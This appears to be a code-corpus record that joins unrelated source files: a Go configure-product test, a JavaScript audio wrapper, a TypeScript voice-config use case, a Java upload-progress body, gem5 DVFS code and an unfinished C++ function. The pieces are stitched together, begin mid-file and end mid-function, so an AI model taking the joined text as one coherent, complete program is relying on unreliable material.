_, err = opsFile.WriteString(`%%%`)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"-c", configFile.Name(),
"-o", opsFile.Name(),
})
Expect(err).To(MatchError(ContainSubstring("could not find expected directive name")))
})
})
})
When("GetStagedProductJobResourceConfig returns an error", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "resource-config": %s}`, resourceConfig)
})
It("returns an error", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedProductJobsReturns(map[string]string{
"some-job": "a-guid",
"some-other-job": "a-different-guid",
"bad": "do-not-use",
}, nil)
service.ConfigureJobResourceConfigReturns(errors.New("some error"))
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).To(MatchError("failed to configure resources: some error"))
})
})
When("certain fields are not provided in the config", func() {
BeforeEach(func() {
config = `{"product-name": "cf"}`
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
},
}, nil)
})
It("logs and then does nothing if they are empty", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
err := executeCommand(command, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
Expect(logger.PrintlnCallCount()).To(Equal(6))
msg := logger.PrintlnArgsForCall(0)[0]
Expect(msg).To(Equal("network properties are not provided, nothing to do here"))
msg = logger.PrintlnArgsForCall(1)[0]
Expect(msg).To(Equal("product properties are not provided, nothing to do here"))
msg = logger.PrintlnArgsForCall(2)[0]
Expect(msg).To(Equal("resource config properties are not provided, nothing to do here"))
msg = logger.PrintlnArgsForCall(3)[0]
Expect(msg).To(Equal("max in flight properties are not provided, nothing to do here"))
msg = logger.PrintlnArgsForCall(4)[0]
Expect(msg).To(Equal("syslog configuration is not provided, nothing to do here"))
msg = logger.PrintlnArgsForCall(5)[0]
Expect(msg).To(Equal("errands are not provided, nothing to do here"))
format, content := logger.PrintfArgsForCall(1)
Expect(fmt.Sprintf(format, content...)).To(ContainSubstring("finished configuring product"))
})
})
When("there is a running installation", func() {
BeforeEach(func() {
service.ListInstallationsReturns([]api.InstallationsServiceOutput{
{
ID: 999,
Status: "running",
Logs: "",
StartedAt: nil,
FinishedAt: nil,
UserName: "admin",
},
}, nil)
config = `{"product-name": "cf"}`
})
It("returns an error", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
err := executeCommand(client, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("OpsManager does not allow configuration or staging changes while apply changes are running to prevent data loss for configuration and/or staging changes"))
Expect(service.ListInstallationsCallCount()).To(Equal(1))
})
})
When("product-version is provided in the config", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{
"product-name": "cf",
"product-properties": %s,
"product-version": 1.2.3
}`, productProperties)
})
It("does not return an error", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
})
})
When("an error occurs", func() {
BeforeEach(func() {
config = `{"product-name": "cf"}`
})
When("the product does not exist", func() {
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
err := executeCommand(command, []string{
"--config", configFile.Name(),
})
Expect(err).To(MatchError(`could not find product "cf"`))
})
})
When("the product resources cannot be decoded", func() {
BeforeEach(func() {
config = `{"product-name": "cf", "resource-config": "%%%%%"}`
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
},
}, nil)
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError(ContainSubstring("could not be parsed as valid configuration: yaml: unmarshal errors")))
})
})
When("the jobs cannot be fetched", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "resource-config": %s}`, resourceConfig)
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
},
}, nil)
service.ListStagedProductJobsReturns(
map[string]string{
"some-job": "a-guid",
}, errors.New("boom"))
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("failed to fetch jobs: boom"))
})
})
When("the product-name is missing from config", func() {
BeforeEach(func() {
config = `{}`
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("could not parse configure-product config: \"product-name\" is required"))
})
})
// Covers --config flag error handling: missing file and unparseable YAML.
When("the --config flag is passed", func() {
When("the provided config path does not exist", func() {
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
},
}, nil)
err := executeCommand(command, []string{"--config", "some/non-existant/path.yml"})
Expect(err).To(MatchError(ContainSubstring("open some/non-existant/path.yml: no such file or directory")))
})
})
When("the provided config file is not valid yaml", func() {
var (
configFile *os.File
err error
)
AfterEach(func() {
os.RemoveAll(configFile.Name())
})
It("returns an error", func() {
invalidConfig := "this is not a valid config"
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
},
}, nil)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(invalidConfig)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{"--config", configFile.Name()})
Expect(err).To(MatchError(ContainSubstring("could not be parsed as valid configuration")))
// NOTE(review): redundant cleanup -- the AfterEach above already
// removes this file; the second RemoveAll is harmless but unnecessary.
os.RemoveAll(configFile.Name())
})
})
})
// API failure while applying product-properties is surfaced to the user.
When("the properties cannot be configured", func() {
BeforeEach(func() {
config = `{"product-name": "some-product", "product-properties": {}, "network-properties": {}}`
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.UpdateStagedProductPropertiesReturns(errors.New("some product error"))
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "some-product"},
},
}, nil)
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("failed to configure product: some product error"))
})
})
// API failure while applying network-properties is surfaced to the user.
When("the networks cannot be configured", func() {
BeforeEach(func() {
config = `{"product-name": "some-product", "product-properties": {}, "network-properties": {}}`
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.UpdateStagedProductNetworksAndAZsReturns(errors.New("some product error"))
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "some-product"},
},
}, nil)
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("failed to configure product: some product error"))
})
})
// API failure while applying syslog-properties is surfaced to the user.
// BUG FIX: this test was registered twice (once as "the syslog cannot be
// configured" and once as "when the syslog cannot be configured") with a
// byte-identical body; the duplicate has been removed.
When("the syslog cannot be configured", func() {
BeforeEach(func() {
config = `{"product-name": "some-product", "product-properties": {}, "syslog-properties": {}}`
})
It("returns an error", func() {
command := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.UpdateSyslogConfigurationReturns(errors.New("some product error"))
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "some-product"},
},
}, nil)
err := executeCommand(command, []string{"--config", configFile.Name()})
Expect(err).To(MatchError("failed to configure product: some product error"))
})
})
// API failure while setting errand state is surfaced with the errand name.
When("errand config errors", func() {
var (
configFile *os.File
err error
)
BeforeEach(func() {
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
})
AfterEach(func() {
os.RemoveAll(configFile.Name())
})
It("errors when calling api", func() {
service.UpdateStagedProductErrandsReturns(errors.New("error configuring errand"))
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(errandConfigFile)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).To(MatchError("failed to set errand state for errand push-usage-service: error configuring errand"))
})
})
// Unknown top-level config keys are rejected and listed (sorted) in the error.
Context("with unrecognized top-level-keys", func() {
It("returns error saying the specified key", func() {
configYAML := `{"product-name": "cf", "unrecognized-other-key": {}, "unrecognized-key": {"some-attr1": "some-val1"}}`
configFile, err := ioutil.TempFile("", "config.yaml")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(configYAML)
Expect(err).ToNot(HaveOccurred())
Expect(configFile.Close()).ToNot(HaveOccurred())
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
err = executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).To(MatchError(ContainSubstring(`the config file contains unrecognized keys: unrecognized-key, unrecognized-other-key`)))
})
})
})
})
})
// Fixture: product-properties payload (JSON) used by the configure tests.
const productProperties = `{
  ".properties.something": {"value": "configure-me"},
  ".a-job.job-property": {"value": {"identity": "username", "password": "<PASSWORD>"} }
}`
// Fixture: network/AZ assignment payload.
const networkProperties = `{
  "singleton_availability_zone": {"name": "az-one"},
  "other_availability_zones": [{"name": "az-two" }, {"name": "az-three"}],
  "network": {"name": "network-one"}
}`
// Fixture: syslog forwarding settings.
const syslogProperties = `{
  "enabled": true,
  "address": "example.com",
  "port": 514,
  "transport_protocol": "tcp"
}`
// Fixture: per-job resource configuration (instances, disks, LBs, max_in_flight).
const resourceConfig = `{
  "some-job": {
    "instances": 1,
    "persistent_disk": { "size_mb": "20480" },
    "instance_type": { "id": "m1.medium" },
    "internet_connected": true,
    "elb_names": ["some-lb"],
    "max_in_flight": "20%"
  },
  "some-other-job": {
    "persistent_disk": { "size_mb": "20480" },
    "instance_type": { "id": "m1.medium" },
    "max_in_flight": 1
  }
}`
// Fixture: YAML config containing a ((password)) variable to be interpolated.
const productPropertiesWithVariableTemplate = `---
product-name: cf
product-properties:
  .properties.something:
    value: configure-me
  .a-job.job-property:
    value:
      identity: username
      password: ((password))`
// Fixture: YAML config exercising selector properties.
const ymlProductProperties = `---
product-name: cf
product-properties:
  .properties.something:
    value: configure-me
  .a-job.job-property:
    value:
      identity: username
      password: <PASSWORD>
  .properties.selector:
    value: "Hello World"
    option_value: "hello"
  .properties.another-selector:
    selected_option: "bye"
`
// Fixture: ops-file that injects an extra property path.
const productOpsFile = `---
- type: replace
  path: /product-properties?/.some.property/value
  value: some-value
`
// Fixture: expected JSON after applying the ops-file above.
const productPropertiesWithOpsFileInterpolated = `{
  ".properties.something": {"value": "configure-me"},
  ".a-job.job-property": {"value": {"identity": "username", "password": "<PASSWORD>"} },
  ".some.property": {"value": "some-value"},
  ".properties.selector": {"value": "Hello World", "option_value": "hello", "selected_option":"hello"},
  ".properties.another-selector": {"option_value": "bye", "selected_option":"bye"}
}`
// Fixture: errand-config YAML used by the errand tests.
const errandConfigFile = `---
product-name: cf
errand-config:
  smoke_tests:
    post-deploy-state: true
    pre-delete-state: default
  push-usage-service:
    post-deploy-state: false
    pre-delete-state: when-changed
`
|
import { Resource } from "./resource.js";
// Web Audio wrapper: loads audio (from a URL or raw ArrayBuffer), plays it in
// a loop with a fade-in, and exposes the live frequency spectrum for
// visualization. Browser-only (uses AudioContext / XMLHttpRequest).
class Audio
{
    timer = null          // interval handle for the fade-in ramp in play()
    source = null         // current AudioBufferSourceNode
    file = null
    audioCtx = null
    shouldStop = false    // set by stop(); makes a late decode a no-op
    frequencyData = [0]   // latest byte spectrum, refreshed by getFreqData()

    // Build the audio graph; call before loading any audio.
    init(){
        //this.stop();
        this.initAudioEngine();
    }

    // Creates context, analyser, gain and script nodes and wires:
    // source -> analyser -> scriptNode -> destination, and
    // source -> gainNode -> destination (the audible, volume-controlled path).
    initAudioEngine(){
        this.audioCtx = new (window.AudioContext || window.webkitAudioContext)(); // define audio context
        // Webkit/blink browsers need prefix, Safari won't work without window.
        this.analyser = this.audioCtx.createAnalyser();
        this.scriptNode = this.audioCtx.createScriptProcessor(1024, 1, 1);
        this.source = this.audioCtx.createBufferSource();
        this.frequencyData = new Uint8Array(this.analyser.frequencyBinCount);
        this.gainNode = this.audioCtx.createGain();
        //
        this.source.connect(this.analyser);
        this.source.connect( this.gainNode);
        this.analyser.connect(this.scriptNode);
        this.scriptNode.connect(this.audioCtx.destination);
        this.gainNode.connect(this.audioCtx.destination)
    }

    // Decode a raw ArrayBuffer and start playback (unless stop() intervened).
    loadAudioFile(data){
        if(this.shouldStop) return;
        let thisObject = this;
        this.audioCtx.decodeAudioData(data,
            function(buffer) {
                thisObject.play(buffer);
            },
            function(e){
                // BUG FIX: the previous handler built this message string but
                // never reported it, silently swallowing decode failures.
                console.error("Error with decoding audio data", e);
            });
    }

    // Fetch a URL as an ArrayBuffer and hand it to loadAudioFile().
    loadAudioByUrl(url){
        this.shouldStop = false;
        let that =this;
        let xhr =new XMLHttpRequest()
        xhr.responseType = 'arraybuffer';
        xhr.addEventListener('load',function(){
            if(xhr.status ===200){
                that.loadAudioFile(xhr.response);
            }
        }.bind(this));
        xhr.open("GET",url);
        xhr.send();
    }

    // Start looped playback of the decoded buffer, ramping the gain from 0 up
    // to `limit` in 0.002 steps every 40ms (a short fade-in).
    play(buffer){
        var that = this;
        that.source.buffer = buffer;
        console.log('...............................playBuffer');
        that.source.loop = true;
        that.source.start(0);
        that.gainNode.gain.value = 0;
        that.limit = 0.8;
        this.timer = setInterval(function () {
            if(that.gainNode.gain.value<that.limit){
                that.gainNode.gain.value+=0.002;
            }else{
                clearInterval(that.timer);
            }
        }, 40);
    }

    // Stop playback (if any) and cancel the fade-in ramp; also flags any
    // in-flight decode to be dropped via shouldStop.
    stop(){
        if(this.source&&this.source.buffer){
            this.source.stop(0) ;
            clearInterval(this.timer);
        }
        this.shouldStop = true;
    }

    pause(){
        this.audioCtx.suspend();
    }

    resume(){
        this.audioCtx.resume();
    }

    // Refresh and return the latest byte frequency spectrum.
    getFreqData(){
        if(this.analyser!=null&&this.analyser!=undefined){
            this.analyser.getByteFrequencyData(this.frequencyData);
        }
        return this.frequencyData;
    }
};
export {Audio};
|
import * as Domain from "domain_voice-configs";
import {
GuildVoiceConfigRepository,
LayeredVoiceConfigRepository,
LayeredVoiceConfig,
} from "domain_voice-configs-write";
import { randomizers, RandomizerReturnType } from "./randomizer";
const v1v2Boundary = 1598886000000; //2020/09/01 00:00:00 UTC+9
/**
 * Returns the first non-nullish `values[i][key]`, scanning layers in order.
 * If every layer misses: when a third argument was supplied (even an explicit
 * `undefined`), it is returned; otherwise an Error("Not Resolved") is thrown.
 */
function select<
T extends Record<string, unknown>,
U extends keyof T,
R extends T[U] | undefined
>(
values: (T | undefined)[],
key: U,
defaultValue?: R
): R | Exclude<T[U], null | undefined> {
for (const value of values) {
if (!value) {
continue;
}
const v = value[key] as Exclude<T[U], null | undefined> | null | undefined;
// Loose != deliberately catches both null and undefined.
if (v != undefined) {
return v;
}
}
// arguments.length distinguishes "caller passed an explicit undefined
// default" from "no default supplied at all".
if (arguments.length === 3) {
return defaultValue as R;
}
throw new Error("Not Resolved");
}
/**
 * Like select(), but each layer is tagged with a provider name; returns both
 * the resolved value and the name of the layer that supplied it.
 * NOTE(review): throws TypeError("Not Resolvable") where select() throws
 * Error("Not Resolved") -- confirm the asymmetry is intentional.
 */
function select2<
T extends Record<string, unknown>,
U extends keyof T,
R extends T[U] | undefined
>(
values: [T | undefined, string][],
key: U,
defaultValue?: [R, string]
): { value: R | Exclude<T[U], null | undefined>; provider: string } {
for (const [rawvalue, provider] of values) {
if (!rawvalue) {
continue;
}
const value = rawvalue[key] as
| Exclude<T[U], null | undefined>
| null
| undefined;
if (value != undefined) {
return { value, provider };
}
}
// Same arguments.length trick as select(): an explicit [undefined, "x"]
// default is honored.
if (arguments.length === 3) {
// eslint-disable-next-line @typescript-eslint/no-non-null-assertion
return { value: defaultValue![0], provider: defaultValue![1] };
}
throw new TypeError("Not Resolvable");
}
/**
 * Resolves a user's read name: member override, then nickname, then user
 * override, then the account name. Nullish-coalescing semantics: an empty
 * string IS an accepted value (only null/undefined are skipped), unlike
 * readName2's truthiness checks.
 */
function readName(
  ms: string | undefined,
  us: string | undefined,
  nickName: string | undefined,
  userName: string
): string {
  for (const candidate of [ms, nickName, us]) {
    if (candidate !== undefined && candidate !== null) {
      return candidate;
    }
  }
  return userName;
}
// Resolved name plus the name of the layer that supplied it.
type ReadName2ReturnType = { value: string; provider: string };
/**
 * Like readName(), but also reports which layer won. Uses truthiness, so an
 * empty-string override is skipped (subtly different from readName's ??).
 */
function readName2(
  ms: string | undefined,
  us: string | undefined,
  nickName: string | undefined,
  userName: string
): ReadName2ReturnType {
  const candidates: [string | undefined, string][] = [
    [ms, "member"],
    [nickName, "nickname"],
    [us, "user"],
  ];
  for (const [value, provider] of candidates) {
    if (value) {
      return { value, provider };
    }
  }
  return { value: userName, provider: "username" };
}
// Abstraction over contextual lookups the usecase needs at runtime.
export interface ContextualDataResolver {
// Timestamp of when the guild was joined, compared against v1v2Boundary
// (epoch milliseconds) -- presumably ms since epoch; TODO confirm.
getGuildJoinedTimeStamp(guild: string): Promise<number>;
}
/**
 * Resolves the effective voice configuration for a user by layering
 * member-level, user-level, per-user randomizer and guild-level settings
 * (in that precedence order).
 */
export class Usecase implements Domain.Usecase {
  constructor(
    private readonly memberVoiceConfig: LayeredVoiceConfigRepository<
      [string, string]
    >,
    private readonly userVoiceConfig: LayeredVoiceConfigRepository<string>,
    private readonly guildVoiceConfig: GuildVoiceConfigRepository,
    private readonly dictionaryRepo: Domain.DictionaryRepository,
    private readonly contextualDataResolver: ContextualDataResolver
  ) {}

  /**
   * Resolves the read name and reports which layer supplied it
   * (member config > nickname > user config > account name).
   */
  async getUserReadNameResolvedBy(
    guild: string,
    user: string,
    nickname: string | undefined,
    username: string
  ): Promise<[string, string]> {
    const { value, provider } = readName2(
      (await this.memberVoiceConfig.get([guild, user]))?.readName,
      (await this.userVoiceConfig.get(user))?.readName,
      nickname,
      username
    );
    return [value, provider];
  }

  /** Merges all config layers into the final applied voice configuration. */
  async appliedVoiceConfig(
    guild: string,
    user: string,
    nickName: string | undefined,
    userName: string
  ): Promise<Domain.AppliedVoiceConfig> {
    const [mss, uss, gvc] = await Promise.all([
      this.memberVoiceConfig.get([guild, user]),
      this.userVoiceConfig.get(user),
      this.guildVoiceConfig.get(guild),
    ]);
    let randomizerVersion = select([mss, uss, gvc], "randomizer", undefined);
    if (!randomizerVersion) {
      // Unconfigured guilds default by join date: after the v1/v2 boundary
      // date they get "v2", older guilds keep "v1".
      const joinedTimestamp = await this.contextualDataResolver.getGuildJoinedTimeStamp(
        guild
      );
      randomizerVersion = v1v2Boundary < joinedTimestamp ? "v2" : "v1";
    }
    const randomizerSupplier = randomizers[randomizerVersion] ?? randomizers.v1;
    const randomizer = randomizerSupplier({ user }).get();
    const allpass = select([mss, uss, randomizer], "allpass", undefined);
    const gws = [mss, uss, randomizer];
    return {
      dictionary: await this.dictionary(guild),
      kind: select(gws, "kind"),
      readName: gvc?.readName
        ? readName(mss?.readName, uss?.readName, nickName, userName)
        : undefined,
      speed: select(gws, "speed"),
      tone: select(gws, "tone"),
      // NOTE(review): maxVolume defaults to 5 here but to 0 in
      // appliedVoiceConfigResolvedBy -- confirm which default is intended.
      volume: Math.min(
        gvc?.maxVolume ?? 5,
        select(gws, "volume", undefined) ?? 0
      ),
      maxReadLimit: gvc?.maxReadLimit ?? 130,
      allpass: allpass,
      intone: select(gws, "intone"),
      threshold: select(gws, "threshold"),
    };
  }

  /**
   * Same resolution as appliedVoiceConfig, but every value also carries the
   * provider name ("member", "user", "server", ...) that supplied it.
   * BUG FIX: removed leftover console.log debug statements that logged the
   * randomizer version and instance on every call.
   */
  async appliedVoiceConfigResolvedBy(
    guild: string,
    user: string,
    nickName: string | undefined,
    userName: string
  ): Promise<Domain.AppliedVoiceConfigResolvedBy> {
    const [gvc, mss, uss] = await Promise.all([
      this.guildVoiceConfig.get(guild),
      this.memberVoiceConfig.get([guild, user]),
      this.userVoiceConfig.get(user),
    ]);
    const ms: [LayeredVoiceConfig | undefined, string] = [mss, "member"];
    const us: [LayeredVoiceConfig | undefined, string] = [uss, "user"];
    let randomizerVersion = select([mss, uss, gvc], "randomizer", undefined);
    if (!randomizerVersion) {
      const joinedTimestamp = await this.contextualDataResolver.getGuildJoinedTimeStamp(
        guild
      );
      randomizerVersion = v1v2Boundary < joinedTimestamp ? "v2" : "v1";
    }
    const randomizerSupplier = randomizers[randomizerVersion] ?? randomizers.v1;
    const randomizer = randomizerSupplier({ user });
    const gws: [
      RandomizerReturnType | LayeredVoiceConfig | undefined,
      string
    ][] = [ms, us, [randomizer.get(), randomizer.name]];
    const allpass = select2(gws, "allpass", [undefined, "default"]);
    const volumegV = gvc?.maxVolume ?? 0;
    const volumemu = select2<
      RandomizerReturnType | LayeredVoiceConfig,
      "volume",
      number
    >(gws, "volume", [0, "default"]);
    let volumeV: number;
    let volumeP: string;
    const readName = gvc?.readName
      ? readName2(mss?.readName, uss?.readName, nickName, userName)
      : { value: undefined, provider: "server" };
    // The guild's maxVolume caps the member/user/randomizer volume; whichever
    // bound wins also determines the reported provider.
    if (volumegV < volumemu.value) {
      volumeV = volumegV;
      volumeP = "server";
    } else {
      volumeV = volumemu.value;
      volumeP = volumemu.provider;
    }
    return {
      dictionary: {
        value: await this.dictionary(guild),
        provider: "default",
      },
      kind: select2(gws, "kind"),
      readName,
      speed: select2(gws, "speed"),
      tone: select2(gws, "tone"),
      volume: { value: volumeV, provider: volumeP },
      maxReadLimit:
        gvc?.maxReadLimit != null
          ? {
              value: gvc.maxReadLimit,
              provider: "server",
            }
          : {
              value: 130,
              provider: "default",
            },
      allpass: allpass,
      intone: select2(gws, "intone"),
      threshold: select2(gws, "threshold"),
    };
  }

  /** Resolves only the read name (member > nickname > user > account name). */
  async getUserReadName(
    guild: string,
    user: string,
    nickName: string | undefined,
    userName: string
  ): Promise<string> {
    return readName(
      (await this.memberVoiceConfig.get([guild, user]))?.readName,
      (await this.userVoiceConfig.get(user))?.readName,
      nickName,
      userName
    );
  }

  /** Fetches the guild's full pronunciation dictionary. */
  dictionary(guild: string): Promise<Domain.Dictionary> {
    return this.dictionaryRepo.getAll(guild);
  }
}
|
# Run Python's unittest CLI, forwarding all script arguments to it.
python -m unittest "$@"
|
<gh_stars>1-10
package com.bhm.sdk.rxlibrary.rxjava;
import android.annotation.SuppressLint;
import androidx.annotation.NonNull;
import com.bhm.sdk.rxlibrary.rxjava.callback.RxUpLoadCallBack;
import com.bhm.sdk.rxlibrary.utils.RxUtils;
import java.io.IOException;
import io.reactivex.Observable;
import io.reactivex.android.schedulers.AndroidSchedulers;
import io.reactivex.functions.Consumer;
import okhttp3.MediaType;
import okhttp3.RequestBody;
import okio.Buffer;
import okio.BufferedSink;
import okio.ForwardingSink;
import okio.Okio;
import okio.Sink;
/**
* Created by bhm on 2018/5/28.
*/
/**
 * A {@link RequestBody} decorator that reports upload progress to the
 * {@code RxUpLoadCallBack} registered on the {@code RxBuilder}, delivering
 * callbacks on the Android main thread.
 *
 * Created by bhm on 2018/5/28.
 */
public class UpLoadRequestBody extends RequestBody {

    private RequestBody mRequestBody; // wrapped body that supplies the bytes
    private RxBuilder rxBuilder;      // holds the (optional) progress listener

    public UpLoadRequestBody(RequestBody requestBody, RxBuilder builder) {
        this.mRequestBody = requestBody;
        this.rxBuilder = builder;
    }

    @Override
    public MediaType contentType() {
        return mRequestBody.contentType();
    }

    /** Delegates to the wrapped body; returns -1 if the length is unknown. */
    @Override
    public long contentLength() throws IOException {
        try {
            return mRequestBody.contentLength();
        } catch (IOException e) {
            e.printStackTrace();
            return -1;
        }
    }

    @Override
    public void writeTo(@NonNull BufferedSink sink) throws IOException {
        // Wrap the sink so every write() updates the progress counter.
        BufferedSink bufferedSink;
        CountingSink mCountingSink = new CountingSink(sink);
        bufferedSink = Okio.buffer(mCountingSink);
        mRequestBody.writeTo(bufferedSink);
        bufferedSink.flush();
    }

    class CountingSink extends ForwardingSink {

        private long bytesWritten = 0L;
        private long contentLength = 0L; // cached; 0 until the first write

        CountingSink(Sink delegate) {
            super(delegate);
        }

        @SuppressLint("CheckResult")
        @Override
        public void write(@NonNull Buffer source, final long byteCount) throws IOException {
            super.write(source, byteCount);
            if (null != rxBuilder && null != rxBuilder.getListener() &&
                    rxBuilder.getListener() instanceof RxUpLoadCallBack) {
                if(contentLength == 0L){
                    contentLength = contentLength();
                }
                if (bytesWritten == 0) {
                    // First chunk: notify onStart() on the main thread.
                    Observable.just(bytesWritten)
                            .observeOn(AndroidSchedulers.mainThread())
                            .subscribe(new Consumer<Long>() {
                                @Override
                                public void accept(Long aLong) throws Exception {
                                    rxBuilder.getListener().onStart();
                                    RxUtils.Logger(rxBuilder, "upLoad-- > ", "begin upLoad");
                                }
                            });
                }
                bytesWritten += byteCount;
                // BUG FIX: contentLength() returns -1 on failure (and may be 0),
                // which previously caused a division by zero or negative
                // progress; report 0 when the total length is unknown.
                final int progress = contentLength > 0
                        ? (int) Math.min(100, bytesWritten * 100 / contentLength)
                        : 0;
                Observable.just(bytesWritten)
                        .observeOn(AndroidSchedulers.mainThread())
                        .subscribe(new Consumer<Long>() {
                            @Override
                            public void accept(Long aLong) throws Exception {
                                rxBuilder.getListener().onProgress(progress, byteCount, contentLength);
                            }
                        });
            }
        }
    }
}
|
<reponame>pnkfb9/gem5_priority<gh_stars>0
#include "dvfs.hh"
#include <cassert>
using namespace std;
// Constructs the DVFS singleton from its SimObject parameters and registers
// itself as the one global instance.
Dvfs::Dvfs(DvfsParams *p) : SimObject(p), recreateFiles(p->recreateFiles)
{
    assert(theInstance==0); //Don't call it twice
    theInstance=this;
}
// Returns the global Dvfs instance.
// NOTE(review): the existence assert is commented out, so this can return
// nullptr before construction -- confirm callers handle that.
Dvfs *Dvfs::instance()
{
    //assert(theInstance); //Has to exist
    return theInstance;
}
// Sizes every per-router statistics vector for numRouters entries
// (new slots are zero-filled; resize keeps existing values) and resets
// the update counter.
void Dvfs::configure(int numRouters)
{
    std::vector<double> *perRouter[] = {
        &totalRouterPower, &staticRouterPower, &dynamicRouterPower,
        &clockRouterPower, &routerFrequency, &routerVoltage,
        &routerTemperature};
    for (std::vector<double> *v : perRouter)
        v->resize(numRouters, 0);
    updateCounter = 0;
}
// Sizes every per-CPU vector for numCpus entries (new slots zero-filled).
void Dvfs::configureCpu(int numCpus)
{
    std::vector<double> *perCpu[] = {&cpuFrequency, &cpuVoltage,
                                     &cpuTemperature};
    for (std::vector<double> *v : perCpu)
        v->resize(numCpus, 0);
}
// Trivial accessors over the per-router / per-CPU statistics vectors.
// The .at(i) calls throw std::out_of_range for an invalid index.
int Dvfs::getUpdateCounter() { return updateCounter; }
int Dvfs::getNumRouters() { return totalRouterPower.size(); }
int Dvfs::getNumCpus() { return cpuFrequency.size(); }
double Dvfs::getTotalRouterPower(int i) { return totalRouterPower.at(i); }
double Dvfs::getStaticRouterPower(int i) { return staticRouterPower.at(i); }
double Dvfs::getDynamicRouterPower(int i) { return dynamicRouterPower.at(i); }
double Dvfs::getClockRouterPower(int i) { return clockRouterPower.at(i); }
double Dvfs::getAverageRouterFrequency(int i) { return routerFrequency.at(i); }
double Dvfs::getAverageCpuFrequency(int i) { return cpuFrequency.at(i); }
double Dvfs::getAverageRouterVoltage(int i) { return routerVoltage.at(i); }
double Dvfs::getAverageCpuVoltage(int i) { return cpuVoltage.at(i); }
// Temperature setters, fed back into runThermalPolicy()'s callback.
void Dvfs::setCpuTemperature(int i, double t) { cpuTemperature.at(i)=t; }
void Dvfs::setRouterTemperature(int i, double t) { routerTemperature.at(i)=t; }
// Invokes the user-registered thermal policy callback, if any; a missing
// callback makes this a no-op. (Dead commented-out debug printing removed.)
void Dvfs::runThermalPolicy()
{
    if(thermalPolicyCallback) thermalPolicyCallback(this);
}
Dvfs::~Dvfs() {}
// Storage for the singleton pointer (set by the constructor).
// NOTE(review): not cleared by the destructor -- dangling after teardown.
Dvfs *Dvfs::theInstance=0;
//
// SimObject factory hook: gem5 instantiates Dvfs from its Python params.
Dvfs *DvfsParams::create()
{
    return new Dvfs(this);
}
|
#include <iostream>
// Returns the sum of all even elements in arr[0..size-1].
// Works for negative values too: n % 2 == 0 holds for every even n in C++.
int sumEven(int arr[], int size)
{
    int total = 0;
    for (const int *p = arr, *end = arr + size; p != end; ++p)
    {
        if (*p % 2 == 0)
        {
            total += *p;
        }
    }
